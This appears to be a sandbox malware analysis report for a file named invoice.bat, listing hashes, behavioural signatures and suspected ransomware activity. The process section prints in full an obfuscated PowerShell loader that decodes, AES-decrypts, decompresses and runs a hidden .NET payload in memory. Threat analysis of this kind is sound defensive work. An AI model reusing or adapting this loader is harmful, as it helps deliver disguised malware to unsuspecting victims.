Analysis
-
max time kernel
28s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
19-01-2023 13:06
Static task
static1
Behavioral task
behavioral1
Sample
invoice.bat
Resource
win7-20221111-en
General
-
Target
invoice.bat
-
Size
49KB
-
MD5
36753b61c8e886f0f49388f72b2435ac
-
SHA1
20c308298c338520543e4c272b2cd2901bd7cb52
-
SHA256
12c87ccc8c293657e41d39202a8ccc02a106ee4128769957d42a206019fcf20d
-
SHA512
cc11219fa92b219d33cd111258fcbda65f02479d06b35c7589040fd9fafff0c842a50f690ad30046eb2e530cb5fbaca3b8ae1c7e23291aeaab4e9acafd5bdc82
-
SSDEEP
768:F8TRp7qCDMI3IbV+qks5F9x+OZmDFBeTUjG1qEsbae4/evfI4yu/:2utIQ95FbCDFEUBR
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
invoice.bat.exepid process 2040 invoice.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 852 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
invoice.bat.exepid process 2040 invoice.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
invoice.bat.exedescription pid process Token: SeDebugPrivilege 2040 invoice.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 852 wrote to memory of 2040 852 cmd.exe invoice.bat.exe PID 852 wrote to memory of 2040 852 cmd.exe invoice.bat.exe PID 852 wrote to memory of 2040 852 cmd.exe invoice.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\invoice.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Users\Admin\AppData\Local\Temp\invoice.bat.exe"invoice.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $qfpLe = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\invoice.bat').Split([Environment]::NewLine);foreach ($zbumi in $qfpLe) { if ($zbumi.StartsWith(':: ')) { $gJJDY = $zbumi.Substring(3); break; }; };$Piqdg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gJJDY);$edVwk = New-Object System.Security.Cryptography.AesManaged;$edVwk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$edVwk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$edVwk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Aiiudw+fXb86Mnh/w13gDxuD3EbVUZkaOyGHqMc/CQY=');$edVwk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sx2hI0APZjv9Fq8D3SERvQ==');$imDxS = $edVwk.CreateDecryptor();$Piqdg = $imDxS.TransformFinalBlock($Piqdg, 0, $Piqdg.Length);$imDxS.Dispose();$edVwk.Dispose();$YZKNZ = New-Object System.IO.MemoryStream(, $Piqdg);$JKRAg = New-Object System.IO.MemoryStream;$YtWFs = New-Object System.IO.Compression.GZipStream($YZKNZ, [IO.Compression.CompressionMode]::Decompress);$YtWFs.CopyTo($JKRAg);$YtWFs.Dispose();$YZKNZ.Dispose();$JKRAg.Dispose();$Piqdg = $JKRAg.ToArray();$DtnJj = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($Piqdg);$rYEbR = $DtnJj.EntryPoint;$rYEbR.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d